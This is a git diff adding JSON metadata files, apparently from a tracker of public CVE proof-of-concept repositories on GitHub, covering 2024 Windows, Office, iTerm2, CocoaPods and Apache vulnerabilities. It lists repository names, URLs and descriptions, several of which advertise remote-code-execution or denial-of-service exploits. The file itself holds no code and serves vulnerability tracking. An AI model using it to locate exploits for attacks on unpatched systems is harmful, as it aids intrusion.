"full_name": "thanawee321\/CVE-2024-38063", + "owner": { + "login": "thanawee321", + "id": 53590032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53590032?v=4", + "html_url": "https:\/\/github.com\/thanawee321", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanawee321\/CVE-2024-38063", + "description": "Vulnerability CVE-2024-38063", + "fork": false, + "created_at": "2024-10-15T03:18:51Z", + "updated_at": "2024-11-20T16:31:07Z", + "pushed_at": "2024-10-18T11:48:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884730855, + "name": "cve-2024-38063-Anonyvader", + "full_name": "AliHj98\/cve-2024-38063-Anonyvader", + "owner": { + "login": "AliHj98", + "id": 99630322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99630322?v=4", + "html_url": "https:\/\/github.com\/AliHj98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AliHj98\/cve-2024-38063-Anonyvader", + "description": null, + "fork": false, + "created_at": "2024-11-07T09:36:32Z", + "updated_at": "2024-11-07T10:47:56Z", + "pushed_at": "2024-11-07T10:47:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889577031, + "name": "CVE-2024-38063", + "full_name": "Dragkob\/CVE-2024-38063", + "owner": { + "login": "Dragkob", + "id": 141576033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141576033?v=4", + "html_url": "https:\/\/github.com\/Dragkob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dragkob\/CVE-2024-38063", + "description": "PoC for Windows' IPv6 CVE-2024-38063", + "fork": false, + "created_at": "2024-11-16T17:22:08Z", + "updated_at": "2024-11-22T00:18:36Z", + "pushed_at": "2024-11-20T13:18:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bsod", + "bsod-crashes", + "cve", + "cvepoc", + "dos", + "ipv6", + "ipv6-network", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890443568, + "name": "CVE-2024-38063", + "full_name": "selenagomez25\/CVE-2024-38063", + "owner": { + "login": "selenagomez25", + "id": 92699085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92699085?v=4", + "html_url": "https:\/\/github.com\/selenagomez25", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/selenagomez25\/CVE-2024-38063", + "description": "poc for exploiting cve-2024-38063", + "fork": false, + "created_at": "2024-11-18T15:20:24Z", + "updated_at": "2024-11-20T15:30:14Z", + "pushed_at": "2024-11-18T15:21:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38077.json b/2024/CVE-2024-38077.json new file mode 100644 index 0000000000..47e4c281b0 --- /dev/null +++ b/2024/CVE-2024-38077.json @@ -0,0 +1,416 @@ +[ + { + "id": 840101981, + "name": "CVE-2024-38077-POC", + "full_name": "SecStarBot\/CVE-2024-38077-POC", + "owner": { + "login": "SecStarBot", + "id": 132645723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132645723?v=4", + "html_url": "https:\/\/github.com\/SecStarBot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecStarBot\/CVE-2024-38077-POC", + "description": null, + "fork": false, + "created_at": "2024-08-09T01:24:59Z", + "updated_at": "2024-11-20T18:09:34Z", + "pushed_at": "2024-08-09T01:19:08Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 223, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 223, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 840155778, + "name": "CVE-2024-38077", + "full_name": "qi4L\/CVE-2024-38077", + "owner": { + "login": "qi4L", + "id": 75202638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75202638?v=4", + "html_url": "https:\/\/github.com\/qi4L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qi4L\/CVE-2024-38077", + "description": "RDL的堆溢出导致的RCE", + "fork": false, + "created_at": "2024-08-09T05:00:44Z", + "updated_at": "2024-11-21T05:20:15Z", + "pushed_at": "2024-08-14T04:43:05Z", + "stargazers_count": 208, + "watchers_count": 208, + "has_discussions": false, + "forks_count": 87, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 87, + "watchers": 208, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 840205980, + "name": "CVE-2024-38077", + "full_name": "Sec-Link\/CVE-2024-38077", + "owner": { + "login": "Sec-Link", + "id": 175936829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175936829?v=4", + "html_url": "https:\/\/github.com\/Sec-Link", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sec-Link\/CVE-2024-38077", + "description": null, + "fork": false, + "created_at": "2024-08-09T07:37:49Z", + "updated_at": "2024-08-09T17:58:46Z", + "pushed_at": "2024-08-09T07:48:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 840208671, + "name": "RDL-detect", + "full_name": "murphysecurity\/RDL-detect", + "owner": { + "login": "murphysecurity", + "id": 101661127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101661127?v=4", + "html_url": "https:\/\/github.com\/murphysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murphysecurity\/RDL-detect", + "description": "远程探测 remote desktop licensing 服务开放情况,用于 CVE-2024-38077 漏洞快速排查", + "fork": false, + "created_at": "2024-08-09T07:45:25Z", + "updated_at": "2024-10-28T17:52:40Z", + "pushed_at": "2024-08-09T08:06:19Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 840208910, + "name": "CVE-2024-38077", + "full_name": "Wlibang\/CVE-2024-38077", + "owner": { + "login": "Wlibang", + "id": 18629232, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18629232?v=4", + "html_url": "https:\/\/github.com\/Wlibang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wlibang\/CVE-2024-38077", + "description": "CVE-2024-38077,本仓库仅用作备份,", + "fork": false, + "created_at": "2024-08-09T07:46:09Z", + "updated_at": "2024-08-18T17:48:39Z", + "pushed_at": "2024-08-09T07:45:58Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 840510667, + "name": "CVE-2024-38077-check", + "full_name": "psl-b\/CVE-2024-38077-check", + "owner": { + "login": "psl-b", + "id": 109031584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109031584?v=4", + "html_url": "https:\/\/github.com\/psl-b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/psl-b\/CVE-2024-38077-check", + "description": null, + "fork": false, + "created_at": "2024-08-09T22:01:46Z", + "updated_at": "2024-08-14T08:21:43Z", + "pushed_at": "2024-08-14T08:21:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840545497, + "name": "CVE-2024-38077-RDLCheck", + "full_name": "zhuxi1965\/CVE-2024-38077-RDLCheck", + "owner": { + "login": "zhuxi1965", + "id": 29396844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29396844?v=4", + "html_url": "https:\/\/github.com\/zhuxi1965", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuxi1965\/CVE-2024-38077-RDLCheck", + "description": "检测RDL服务是否运行,快速排查受影响资产", + "fork": false, + "created_at": "2024-08-10T01:10:06Z", + "updated_at": "2024-10-23T00:13:08Z", + "pushed_at": "2024-08-10T02:19:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840609471, + "name": "CVE-2024-38077-notes", + "full_name": "lworld0x00\/CVE-2024-38077-notes", + "owner": { + "login": "lworld0x00", + "id": 9474721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9474721?v=4", + "html_url": "https:\/\/github.com\/lworld0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lworld0x00\/CVE-2024-38077-notes", + "description": null, + "fork": false, + "created_at": "2024-08-10T06:31:04Z", + "updated_at": "2024-08-10T06:31:08Z", + "pushed_at": "2024-08-10T06:31:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840708179, + "name": "CVE-2024-38077-check", + "full_name": "atlassion\/CVE-2024-38077-check", + "owner": { + "login": "atlassion", + "id": 49542929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49542929?v=4", + "html_url": "https:\/\/github.com\/atlassion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atlassion\/CVE-2024-38077-check", + "description": "基于135端口检测目标是否存在CVE-2024-38077漏洞", + "fork": false, + "created_at": "2024-08-10T12:49:51Z", + "updated_at": "2024-10-28T17:52:41Z", + "pushed_at": "2024-08-10T09:48:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 842828344, + "name": "fyne-gui", + "full_name": "BBD-YZZ\/fyne-gui", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/fyne-gui", + "description": "CVE-2024-38077,仅支持扫描测试~", + "fork": false, + "created_at": "2024-08-15T07:14:00Z", + "updated_at": "2024-11-17T09:25:51Z", + "pushed_at": "2024-08-15T08:33:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846450999, + "name": "check_38077", + "full_name": "Destiny0991\/check_38077", + "owner": { + "login": "Destiny0991", + "id": 63272016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63272016?v=4", + "html_url": "https:\/\/github.com\/Destiny0991", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Destiny0991\/check_38077", + "description": "Windows远程桌面授权服务CVE-2024-38077检测工具", + "fork": false, + "created_at": "2024-08-23T08:32:40Z", + "updated_at": "2024-09-28T14:47:30Z", + "pushed_at": "2024-08-23T08:48:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869931882, + "name": "CVE-2024-38077", + "full_name": "mrmtwoj\/CVE-2024-38077", + "owner": { + "login": "mrmtwoj", + "id": 22832463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22832463?v=4", + "html_url": "https:\/\/github.com\/mrmtwoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrmtwoj\/CVE-2024-38077", + "description": "CVE-2024-38077: Remote Code Execution Vulnerability in Windows Remote Desktop Licensing Service", + "fork": false, + "created_at": "2024-10-09T06:39:21Z", + "updated_at": "2024-11-21T09:33:12Z", + "pushed_at": "2024-10-09T06:42:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-38077", + "cve-2024-38077poc", + "licensing-service", + "poc", + "rce", + "rce-exploit", + "remote-code", + "remote-code-execution", + "vulnerability", + "windows-remote-desktop" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884867852, + "name": "CVE-2024-38077", + "full_name": "amfg145\/CVE-2024-38077", + "owner": { + "login": "amfg145", + "id": 16266637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16266637?v=4", + "html_url": "https:\/\/github.com\/amfg145", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amfg145\/CVE-2024-38077", + "description": "CVE-2024-38077 private for 10 hands", + "fork": false, + "created_at": "2024-11-07T14:31:42Z", + "updated_at": "2024-11-07T14:39:01Z", + "pushed_at": "2024-11-07T14:38:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38080.json b/2024/CVE-2024-38080.json new file mode 100644 index 0000000000..80ee005e09 --- /dev/null +++ b/2024/CVE-2024-38080.json @@ -0,0 +1,33 @@ +[ + { + "id": 850642925, + "name": "CVE-2024-38080", + "full_name": "pwndorei\/CVE-2024-38080", + "owner": { + "login": "pwndorei", + "id": 96749184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4", + "html_url": "https:\/\/github.com\/pwndorei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-38080", + "description": "poc code for CVE-2024-38080", + "fork": false, + "created_at": "2024-09-01T11:25:22Z", + "updated_at": "2024-11-20T18:43:04Z", + "pushed_at": "2024-09-01T11:35:25Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38100.json b/2024/CVE-2024-38100.json new file mode 100644 index 0000000000..aa2f4d72ce --- /dev/null +++ b/2024/CVE-2024-38100.json @@ -0,0 +1,33 @@ +[ + { + "id": 838985906, + "name": "CVE-2024-38100-RCE-POC", + "full_name": "Florian-Hoth\/CVE-2024-38100-RCE-POC", + "owner": { + "login": "Florian-Hoth", + "id": 177672507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177672507?v=4", + "html_url": "https:\/\/github.com\/Florian-Hoth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Florian-Hoth\/CVE-2024-38100-RCE-POC", + "description": "CVE-2024-38100 Windows Leaked Wallpaper Escelation to RCE vulnerability", + "fork": false, + "created_at": "2024-08-06T18:26:50Z", + "updated_at": "2024-10-25T09:41:56Z", + "pushed_at": "2024-08-06T18:29:09Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38124.json b/2024/CVE-2024-38124.json new file mode 100644 index 0000000000..04ebc64a25 --- /dev/null +++ b/2024/CVE-2024-38124.json @@ -0,0 +1,33 @@ +[ + { + "id": 878525695, + "name": "Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468", + "full_name": "tadash10\/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468", + "owner": { + "login": "tadash10", + "id": 126980610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126980610?v=4", + "html_url": "https:\/\/github.com\/tadash10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadash10\/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468", + "description": null, + "fork": false, + "created_at": "2024-10-25T14:53:12Z", + "updated_at": "2024-11-07T03:49:52Z", + "pushed_at": "2024-11-07T03:49:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38127.json b/2024/CVE-2024-38127.json new file mode 100644 index 0000000000..48d35dcb22 --- /dev/null +++ b/2024/CVE-2024-38127.json @@ -0,0 +1,33 @@ +[ + { + "id": 857638218, + "name": "CVE-2024-38127", + "full_name": "pwndorei\/CVE-2024-38127", + "owner": { + "login": "pwndorei", + "id": 96749184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4", + "html_url": "https:\/\/github.com\/pwndorei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-38127", + "description": null, + "fork": false, + "created_at": "2024-09-15T07:38:44Z", + "updated_at": "2024-11-20T16:31:04Z", + "pushed_at": "2024-09-15T07:39:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38144.json b/2024/CVE-2024-38144.json new file mode 100644 index 0000000000..a1b4ac9676 --- /dev/null +++ b/2024/CVE-2024-38144.json @@ -0,0 +1,33 @@ +[ + { + "id": 864791204, + "name": "CVE-2024-38144", + "full_name": "Dor00tkit\/CVE-2024-38144", + "owner": { + "login": "Dor00tkit", + "id": 47893732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47893732?v=4", + "html_url": "https:\/\/github.com\/Dor00tkit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dor00tkit\/CVE-2024-38144", + "description": "CVE-2024-38144 - DoS PoC", + "fork": false, + "created_at": "2024-09-29T07:04:58Z", + "updated_at": "2024-10-17T10:01:13Z", + "pushed_at": "2024-09-29T07:13:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38189.json b/2024/CVE-2024-38189.json new file mode 100644 index 0000000000..2f56745ed7 --- /dev/null +++ b/2024/CVE-2024-38189.json @@ -0,0 +1,33 @@ +[ + { + "id": 845024796, + "name": "CVE-2024-38189", + "full_name": "vx7z\/CVE-2024-38189", + "owner": { + "login": "vx7z", + "id": 171666083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171666083?v=4", + "html_url": "https:\/\/github.com\/vx7z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vx7z\/CVE-2024-38189", + "description": null, + "fork": false, + "created_at": "2024-08-20T12:41:57Z", + "updated_at": "2024-11-28T16:04:55Z", + "pushed_at": "2024-08-20T15:36:45Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38193.json b/2024/CVE-2024-38193.json new file mode 100644 index 0000000000..6952bd1e1e --- /dev/null +++ b/2024/CVE-2024-38193.json @@ -0,0 +1,33 @@ +[ + { + "id": 890642037, + "name": "CVE-2024-38193", + "full_name": "Nephster\/CVE-2024-38193", + "owner": { + "login": "Nephster", + "id": 7522000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7522000?v=4", + "html_url": "https:\/\/github.com\/Nephster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nephster\/CVE-2024-38193", + "description": null, + "fork": false, + "created_at": "2024-11-18T23:34:34Z", + "updated_at": "2024-11-20T12:45:41Z", + "pushed_at": "2024-11-18T23:48:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38200.json b/2024/CVE-2024-38200.json new file mode 100644 index 0000000000..41fc0742a7 --- /dev/null +++ b/2024/CVE-2024-38200.json @@ -0,0 +1,33 @@ +[ + { + "id": 862544939, + "name": "CVE-2024-38200", + "full_name": "passtheticket\/CVE-2024-38200", + "owner": { + "login": "passtheticket", + "id": 76125965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76125965?v=4", + "html_url": "https:\/\/github.com\/passtheticket", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passtheticket\/CVE-2024-38200", + "description": "CVE-2024-38200 - Microsoft Office NTLMv2 Disclosure Vulnerability ", + "fork": false, + "created_at": "2024-09-24T19:24:55Z", + "updated_at": "2024-11-21T05:18:34Z", + "pushed_at": "2024-10-20T19:08:56Z", + "stargazers_count": 129, + "watchers_count": 129, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 129, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38366.json b/2024/CVE-2024-38366.json new file mode 100644 index 0000000000..097631bcf3 --- /dev/null +++ b/2024/CVE-2024-38366.json @@ -0,0 +1,36 @@ +[ + { + "id": 821403467, + "name": "CocoaPods-RCE_CVE-2024-38366", + "full_name": "ReeFSpeK\/CocoaPods-RCE_CVE-2024-38366", + "owner": { + "login": "ReeFSpeK", + "id": 24816171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24816171?v=4", + "html_url": "https:\/\/github.com\/ReeFSpeK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReeFSpeK\/CocoaPods-RCE_CVE-2024-38366", + "description": "CocoaPods RCE Vulnerability CVE-2024-38366", + "fork": false, + "created_at": "2024-06-28T13:11:28Z", + "updated_at": "2024-08-21T02:55:10Z", + "pushed_at": "2024-07-01T12:28:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cocoapods", + "cve-2024-38366" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38396.json b/2024/CVE-2024-38396.json new file mode 100644 index 0000000000..3b0e829ba3 --- /dev/null +++ b/2024/CVE-2024-38396.json @@ -0,0 +1,33 @@ +[ + { + "id": 815829677, + "name": "poc-cve-2024-38396", + "full_name": "vin01\/poc-cve-2024-38396", + "owner": { + "login": "vin01", + "id": 30344579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30344579?v=4", + "html_url": "https:\/\/github.com\/vin01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vin01\/poc-cve-2024-38396", + "description": "PoC for iTerm2 CVEs CVE-2024-38396 and CVE-2024-38395 which allow code execution", + "fork": false, + "created_at": "2024-06-16T09:43:46Z", + "updated_at": "2024-11-11T03:07:31Z", + "pushed_at": "2024-06-16T09:51:05Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38472.json b/2024/CVE-2024-38472.json new file mode 100644 index 0000000000..9f003b0340 --- /dev/null +++ b/2024/CVE-2024-38472.json @@ -0,0 +1,75 @@ +[ + { + "id": 837656120, + "name": "CVE-2024-38472", + "full_name": "Abdurahmon3236\/CVE-2024-38472", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-38472", + "description": null, + "fork": false, + "created_at": "2024-08-03T16:08:28Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-03T19:32:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868234685, + "name": "apache-vulnerability-testing", + "full_name": "mrmtwoj\/apache-vulnerability-testing", + "owner": { + "login": "mrmtwoj", + "id": 22832463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22832463?v=4", + "html_url": "https:\/\/github.com\/mrmtwoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrmtwoj\/apache-vulnerability-testing", + "description": "Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709", + "fork": false, + "created_at": "2024-10-05T20:32:45Z", + "updated_at": "2024-11-24T19:15:43Z", + "pushed_at": "2024-10-05T20:37:02Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache2", + "cve-2023-3870", + "cve-2024-38472", + "cve-2024-38473", + "cve-2024-38474", + "cve-2024-38475", + "cve-2024-38476", + "cve-2024-38477", + "cve-2024-39573" + ], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38473.json b/2024/CVE-2024-38473.json new file mode 100644 index 0000000000..936684eeac --- /dev/null +++ b/2024/CVE-2024-38473.json @@ -0,0 +1,64 @@ +[ + { + "id": 837366074, + "name": "CVE-2024-38473", + "full_name": "Abdurahmon3236\/CVE-2024-38473", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-38473", + "description": null, + "fork": false, + "created_at": "2024-08-02T19:57:52Z", + "updated_at": "2024-10-29T00:41:05Z", + "pushed_at": "2024-08-02T20:01:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846595537, + "name": "CVE-2024-38473-Nuclei-Template", + "full_name": "juanschallibaum\/CVE-2024-38473-Nuclei-Template", + "owner": { + "login": "juanschallibaum", + "id": 16741330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16741330?v=4", + "html_url": "https:\/\/github.com\/juanschallibaum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/juanschallibaum\/CVE-2024-38473-Nuclei-Template", + "description": "Nuclei template to detect Apache servers vulnerable to CVE-2024-38473", + "fork": false, + "created_at": "2024-08-23T14:39:31Z", + "updated_at": "2024-11-20T22:45:58Z", + "pushed_at": "2024-08-24T22:42:42Z", + "stargazers_count": 26, + 